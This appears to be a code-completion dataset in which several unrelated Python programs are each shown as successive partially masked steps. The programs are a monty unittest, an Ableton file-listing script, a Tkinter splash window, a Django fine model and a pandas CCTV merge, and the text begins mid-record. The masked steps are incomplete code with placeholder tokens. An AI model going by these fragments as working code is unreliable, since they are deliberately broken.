self._use_child_references and child_node_count > 0:\n if current <= len(child_results):\n result += child_results[current - 1]\n else:\n result += current\n pos += 1\n return pos, result\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
<|reserved_special_token_0|> class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class LittleCatB(LittleCatA): pass class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) <|reserved_special_token_0|> <|reserved_special_token_1|> from __future__ import division, unicode_literals import unittest from monty.inspect import * class LittleCatA(object): pass class LittleCatB(LittleCatA): pass class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) if __name__ == '__main__': unittest.main() <|reserved_special_token_1|> # coding: utf-8 from __future__ import division, unicode_literals import unittest from monty.inspect import * class LittleCatA(object): pass class LittleCatB(LittleCatA): pass class LittleCatC(object): pass class LittleCatD(LittleCatB): pass class InspectTest(unittest.TestCase): def test_func(self): # Not a real test. Need something better. self.assertTrue(find_top_pyfile()) self.assertTrue(caller_name()) def test_all_subclasses(self): self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD]) if __name__ == "__main__": unittest.main()
flexible
{ "blob_id": "89605ff723d2f78e85cae458d576494718b5d456", "index": 1193, "step-1": "<mask token>\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n <mask token>\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\nclass LittleCatC(object):\n pass\n\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\nclass LittleCatB(LittleCatA):\n pass\n\n\nclass LittleCatC(object):\n pass\n\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\n<mask token>\n", "step-4": "from __future__ import division, unicode_literals\nimport unittest\nfrom monty.inspect import *\n\n\nclass LittleCatA(object):\n pass\n\n\nclass LittleCatB(LittleCatA):\n pass\n\n\nclass LittleCatC(object):\n pass\n\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\nif __name__ == '__main__':\n unittest.main()\n", "step-5": "# coding: utf-8\nfrom __future__ import division, unicode_literals\n\nimport unittest\n\nfrom monty.inspect import *\n\nclass LittleCatA(object):\n pass\n\nclass LittleCatB(LittleCatA):\n pass\n\nclass LittleCatC(object):\n pass\n\nclass LittleCatD(LittleCatB):\n pass\n\n\nclass InspectTest(unittest.TestCase):\n\n def test_func(self):\n # Not a real test. Need something better.\n self.assertTrue(find_top_pyfile())\n self.assertTrue(caller_name())\n\n def test_all_subclasses(self):\n self.assertEqual(all_subclasses(LittleCatA), [LittleCatB, LittleCatD])\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "step-ids": [ 2, 5, 6, 9, 10 ] }
[ 2, 5, 6, 9, 10 ]
<|reserved_special_token_0|> def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime <|reserved_special_token_0|> def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime def print_list(x): for i in range(0, len(x)): print(x[i]) return x def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith(filetype): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] def collectElements(dir): for directory in dir: for filename in directory: if filename.endswith('.als'): thefiles.append(filename) return thefiles <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime def print_list(x): for i in range(0, len(x)): print(x[i]) return x def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith(filetype): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] def collectElements(dir): for directory in dir: for filename in directory: if filename.endswith('.als'): thefiles.append(filename) return thefiles <|reserved_special_token_0|> print(dirs) print(collectElements(dirs)) <|reserved_special_token_0|> for item in fileList(filePath): file.write(os.path.basename(item) + ', ' + convertIntToTimestamp( get_lastupdate_date(item)) + ', ' + convertIntToTimestamp( creation_date(item)) + ', ' + os.path.abspath(item) + '\n') file.close with open('testcsv.csv', 'w+') as fp: a = csv.writer(fp, delimiter=',') a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path']) for item in fileList(filePath): a.writerow([os.path.basename(item), convertIntToTimestamp( get_lastupdate_date(item)), convertIntToTimestamp(creation_date (item)), os.path.abspath(item)]) <|reserved_special_token_1|> import os, sys, datetime, csv, platform def get_lastupdate_date(path): return os.path.getmtime(path) def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) def getFilename(name): return os.path.basename(name) def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: return stat.st_mtime def print_list(x): for i in range(0, len(x)): print(x[i]) return x def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith(filetype): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not x.startswith('.')] def collectElements(dir): for directory in dir: for filename in directory: if filename.endswith('.als'): thefiles.append(filename) return thefiles subpath = [] subdirs = [] thefiles = [] thelist = [] filePath = '/Users/blakenicholson/Dropbox/Ableton Projects' dirs = mylistdir(filePath) print(dirs) print(collectElements(dirs)) file = open('testtext.txt', 'w+') for item in fileList(filePath): file.write(os.path.basename(item) + ', ' + convertIntToTimestamp( get_lastupdate_date(item)) + ', ' + convertIntToTimestamp( creation_date(item)) + ', ' + os.path.abspath(item) + '\n') file.close with open('testcsv.csv', 'w+') as fp: a = csv.writer(fp, delimiter=',') a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path']) for item in fileList(filePath): a.writerow([os.path.basename(item), convertIntToTimestamp( get_lastupdate_date(item)), convertIntToTimestamp(creation_date (item)), os.path.abspath(item)]) <|reserved_special_token_1|> import os, sys, datetime, csv, platform ####FUNCTIONS#### #Get Creation Time def get_lastupdate_date(path): return os.path.getmtime(path) #Get Date From String def convertIntToTimestamp(timeint): return str(datetime.datetime.fromtimestamp(timeint)) #Get Filename def getFilename(name): return os.path.basename(name) # Get File Creation Time def creation_date(path): """ Try to get the date that a file was created, falling back to when it was last modified if that isn't possible. See http://stackoverflow.com/a/39501288/1709587 for explanation. """ if platform.system() == 'Windows': return os.path.getctime(path) else: stat = os.stat(path) try: return stat.st_birthtime except AttributeError: # We're probably on Linux. No easy way to get creation dates here, # so we'll settle for when its content was last modified. return stat.st_mtime #Print List def print_list(x): for i in range(0,len(x)): print(x[i]) return x #Listing Files def fileList(source, filetype='.als'): matches = [] for root, dirnames, filenames in os.walk(source): for filename in filenames: if filename.endswith((filetype)): matches.append(os.path.join(root, filename)) return matches def mylistdir(directory): """A specialized version of os.listdir() that ignores files that start with a leading period.""" filelist = os.listdir(directory) return [x for x in filelist if not (x.startswith('.'))] def collectElements(dir): ## collecting elements into a list for directory in dir: for filename in directory: if filename.endswith(".als"): thefiles.append(filename) return thefiles ## INPUTDIRECTORIES subpath = [] subdirs = [] thefiles = [] thelist = [] ## Examples of Directories #/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects #/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project filePath = r"/Users/blakenicholson/Dropbox/Ableton Projects" #filePath = raw_input('File path would you like to use: ') dirs = mylistdir(filePath) print(dirs) print(collectElements(dirs)) #Writes contents of filePath to a txt file file = open("testtext.txt","w+") for item in fileList(filePath): file.write(os.path.basename(item) +", "+convertIntToTimestamp(get_lastupdate_date(item))+", "+convertIntToTimestamp(creation_date(item))+", "+os.path.abspath(item)+"\n") file.close #convert txt -> csv with open('testcsv.csv', 'w+') as fp: a = csv.writer(fp, delimiter=',') a.writerow(['File Name','Updated Date','Created Date','Path']) for item in fileList(filePath): a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])
flexible
{ "blob_id": "e83b6b1f4cb12fe3b932903eddddfb0dc0e7d98d", "index": 2765, "step-1": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\n<mask token>\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\n", "step-3": "<mask token>\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\n<mask token>\nprint(dirs)\nprint(collectElements(dirs))\n<mask token>\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n", "step-4": "import os, sys, datetime, csv, platform\n\n\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n\n\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n\ndef getFilename(name):\n return os.path.basename(name)\n\n\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n return stat.st_mtime\n\n\ndef print_list(x):\n for i in range(0, len(x)):\n print(x[i])\n return x\n\n\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith(filetype):\n matches.append(os.path.join(root, filename))\n return matches\n\n\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist if not x.startswith('.')]\n\n\ndef collectElements(dir):\n for directory in dir:\n for filename in directory:\n if filename.endswith('.als'):\n thefiles.append(filename)\n return thefiles\n\n\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\nfilePath = '/Users/blakenicholson/Dropbox/Ableton Projects'\ndirs = mylistdir(filePath)\nprint(dirs)\nprint(collectElements(dirs))\nfile = open('testtext.txt', 'w+')\nfor item in fileList(filePath):\n file.write(os.path.basename(item) + ', ' + convertIntToTimestamp(\n get_lastupdate_date(item)) + ', ' + convertIntToTimestamp(\n creation_date(item)) + ', ' + os.path.abspath(item) + '\\n')\nfile.close\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name', 'Updated Date', 'Created Date', 'Path'])\n for item in fileList(filePath):\n a.writerow([os.path.basename(item), convertIntToTimestamp(\n get_lastupdate_date(item)), convertIntToTimestamp(creation_date\n (item)), os.path.abspath(item)])\n", "step-5": "import os, sys, datetime, csv, platform\n\n####FUNCTIONS####\n\n#Get Creation Time\ndef get_lastupdate_date(path):\n return os.path.getmtime(path)\n \n#Get Date From String\ndef convertIntToTimestamp(timeint):\n return str(datetime.datetime.fromtimestamp(timeint))\n\n#Get Filename\ndef getFilename(name):\n return os.path.basename(name)\n\n# Get File Creation Time\ndef creation_date(path):\n \"\"\"\n Try to get the date that a file was created, falling back to when it was\n last modified if that isn't possible.\n See http://stackoverflow.com/a/39501288/1709587 for explanation.\n \"\"\"\n if platform.system() == 'Windows':\n return os.path.getctime(path)\n else:\n stat = os.stat(path)\n try:\n return stat.st_birthtime\n except AttributeError:\n # We're probably on Linux. No easy way to get creation dates here,\n # so we'll settle for when its content was last modified.\n return stat.st_mtime\n\n#Print List\ndef print_list(x):\n\tfor i in range(0,len(x)):\n\t\tprint(x[i])\n\treturn x\n\n#Listing Files\ndef fileList(source, filetype='.als'):\n matches = []\n for root, dirnames, filenames in os.walk(source):\n for filename in filenames:\n if filename.endswith((filetype)):\n matches.append(os.path.join(root, filename))\n return matches\n\t\ndef mylistdir(directory):\n \"\"\"A specialized version of os.listdir() that ignores files that\n start with a leading period.\"\"\"\n filelist = os.listdir(directory)\n return [x for x in filelist\n if not (x.startswith('.'))]\n\ndef collectElements(dir):\n ## collecting elements into a list\n for directory in dir:\n for filename in directory:\n if filename.endswith(\".als\"):\n thefiles.append(filename) \n return thefiles\n\n\n## INPUTDIRECTORIES\nsubpath = []\nsubdirs = []\nthefiles = []\nthelist = []\n\n## Examples of Directories\n#/Users/blakenicholson/Documents/Personal/Projects/Music Production/Ableton Projects\n#/Volumes/Samsung_T3/Old Ableton Projects/1.RELEASED/Neuromansah - DumbBlake Project\n\nfilePath = r\"/Users/blakenicholson/Dropbox/Ableton Projects\"\n#filePath = raw_input('File path would you like to use: ')\ndirs = mylistdir(filePath)\nprint(dirs)\n\n\nprint(collectElements(dirs))\n\n#Writes contents of filePath to a txt file\nfile = open(\"testtext.txt\",\"w+\")\nfor item in fileList(filePath):\n file.write(os.path.basename(item) +\", \"+convertIntToTimestamp(get_lastupdate_date(item))+\", \"+convertIntToTimestamp(creation_date(item))+\", \"+os.path.abspath(item)+\"\\n\") \nfile.close\n\n#convert txt -> csv\nwith open('testcsv.csv', 'w+') as fp:\n a = csv.writer(fp, delimiter=',')\n a.writerow(['File Name','Updated Date','Created Date','Path'])\n for item in fileList(filePath):\n a.writerow([ os.path.basename(item) , convertIntToTimestamp(get_lastupdate_date(item)), convertIntToTimestamp(creation_date(item)), os.path.abspath(item)])\n ", "step-ids": [ 5, 8, 9, 11, 12 ] }
[ 5, 8, 9, 11, 12 ]
<|reserved_special_token_0|> def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) <|reserved_special_token_0|> root.title('3 Second Splash') root.geometry('250x250') <|reserved_special_token_0|> b.place(relx=0.5, rely=0.5, anchor=CENTER) root.mainloop() <|reserved_special_token_1|> <|reserved_special_token_0|> def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) root = Tk() root.title('3 Second Splash') root.geometry('250x250') b = Button(root, text='Launch splash window', command=create_window) b.place(relx=0.5, rely=0.5, anchor=CENTER) root.mainloop() <|reserved_special_token_1|> from Tkinter import * import time def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window, width=w, height=h) canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds', font='Arial') canvas.pack() window.overrideredirect(1) window.geometry('%dx%d+0+0' % (w, h)) window.after(3000, lambda : window.destroy()) root = Tk() root.title('3 Second Splash') root.geometry('250x250') b = Button(root, text='Launch splash window', command=create_window) b.place(relx=0.5, rely=0.5, anchor=CENTER) root.mainloop() <|reserved_special_token_1|> from Tkinter import * import time def create_window(): window = Toplevel(root) w, h = root.winfo_screenwidth(), root.winfo_screenheight() canvas = Canvas(window,width=w,height=h) canvas.create_text(w/2,h/2,text="this will close after 3 seconds",font="Arial") canvas.pack() window.overrideredirect(1) window.geometry("%dx%d+0+0" % (w, h)) window.after(3000, lambda: window.destroy()) root = Tk() root.title("3 Second Splash") root.geometry("250x250") b = Button(root, text="Launch splash window", command=create_window) b.place(relx=0.5,rely=0.5,anchor=CENTER) #b.pack() root.mainloop()
flexible
{ "blob_id": "cac49a9a2cb753bb81c45ac1d2d887b1f48dd9bb", "index": 9562, "step-1": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\n", "step-2": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\n<mask token>\nroot.title('3 Second Splash')\nroot.geometry('250x250')\n<mask token>\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n", "step-3": "<mask token>\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n", "step-4": "from Tkinter import *\nimport time\n\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window, width=w, height=h)\n canvas.create_text(w / 2, h / 2, text='this will close after 3 seconds',\n font='Arial')\n canvas.pack()\n window.overrideredirect(1)\n window.geometry('%dx%d+0+0' % (w, h))\n window.after(3000, lambda : window.destroy())\n\n\nroot = Tk()\nroot.title('3 Second Splash')\nroot.geometry('250x250')\nb = Button(root, text='Launch splash window', command=create_window)\nb.place(relx=0.5, rely=0.5, anchor=CENTER)\nroot.mainloop()\n", "step-5": "from Tkinter import *\nimport time\n\ndef create_window():\n window = Toplevel(root)\n w, h = root.winfo_screenwidth(), root.winfo_screenheight()\n canvas = Canvas(window,width=w,height=h)\n canvas.create_text(w/2,h/2,text=\"this will close after 3 seconds\",font=\"Arial\")\n canvas.pack()\n window.overrideredirect(1)\n window.geometry(\"%dx%d+0+0\" % (w, h))\n window.after(3000, lambda: window.destroy())\n \nroot = Tk()\nroot.title(\"3 Second Splash\")\nroot.geometry(\"250x250\")\nb = Button(root, text=\"Launch splash window\", command=create_window)\nb.place(relx=0.5,rely=0.5,anchor=CENTER)\n#b.pack()\n\nroot.mainloop()\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
from django.contrib.auth.decorators import permission_required from django.db import models from students.models import Student # Create your models here. class Fine(models.Model): amount = models.DecimalField(max_digits=8, decimal_places=2, null=True, default=0) student = models.OneToOneField(Student, on_delete=models.DO_NOTHING) timestamp = models.DateField(auto_now_add=True) updated_at = models.DateField(auto_now=True) class Meta: db_table = 'fines' verbose_name_plural = 'Fines' verbose_name = 'Fine' def __str__(self): return str(self.amount)
normal
{ "blob_id": "22b697790516e1160ac501a58ad93ef5b579414a", "index": 7109, "step-1": "<mask token>\n\n\nclass Fine(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Fine(models.Model):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-3": "<mask token>\n\n\nclass Fine(models.Model):\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=True,\n default=0)\n student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)\n timestamp = models.DateField(auto_now_add=True)\n updated_at = models.DateField(auto_now=True)\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-4": "from django.contrib.auth.decorators import permission_required\nfrom django.db import models\nfrom students.models import Student\n\n\nclass Fine(models.Model):\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=True,\n default=0)\n student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)\n timestamp = models.DateField(auto_now_add=True)\n updated_at = models.DateField(auto_now=True)\n\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-5": "from django.contrib.auth.decorators import permission_required\nfrom django.db import models\nfrom students.models import Student\n\n\n# Create your models here.\n\nclass Fine(models.Model):\n amount = models.DecimalField(max_digits=8, decimal_places=2, null=True, default=0)\n student = models.OneToOneField(Student, on_delete=models.DO_NOTHING)\n timestamp = models.DateField(auto_now_add=True)\n updated_at = models.DateField(auto_now=True)\n\n class Meta:\n db_table = 'fines'\n verbose_name_plural = 'Fines'\n verbose_name = 'Fine'\n\n def __str__(self):\n return str(self.amount)\n", "step-ids": [ 1, 2, 3, 4, 5 ] }
[ 1, 2, 3, 4, 5 ]
import pandas as pd # 데이터 로드 train_data = pd.read_csv('./dataset/train_park_daycare.csv') cctv = pd.read_csv("./dataset/cctv_origin.csv", encoding="EUC-KR") ## 데이터 전처리 # 데이터 추출 cctv = cctv.iloc[1:, :2] # 구 매핑 gu_dict_num = {'용산구': 0, '양천구': 1, '강동구': 2, '관악구': 3, '노원구': 4, '영등포': 5, '영등포구': 5, '마포구': 6, '서초구': 7, '성동구': 8, '금천구': 9, '도봉구': 10, '동작구': 11, '강서구': 12, '동대문': 13, '동대문구': 13, '강북구': 14, '서대문': 15, '서대문구': 15, '광진구': 16, '구로구': 17, '성북구': 18, '강남구': 19, '종로구': 20, '중구': 21, '중랑구': 22, '송파구': 23, '은평구': 24} gu_list = [] for i in cctv['구분']: gu_list.append(gu_dict_num[i]) cctv['gu'] = gu_list cctv.drop(['구분'], axis=1, inplace=True) # 컬럼 이름 변경 cctv = cctv.rename(columns={'총계': 'cctv_num'}) # 데이터 타입 변경 cctv['cctv_num'] = cctv['cctv_num'].apply(lambda x: "".join(x.split(','))) cctv['cctv_num'] = pd.to_numeric(cctv['cctv_num']) # 조인 new_data = pd.merge(train_data, cctv, on='gu', how='left') print(new_data.info()) # 저장 new_data.to_csv("./dataset/train_add_cctv.csv", header=True, index=False)
normal
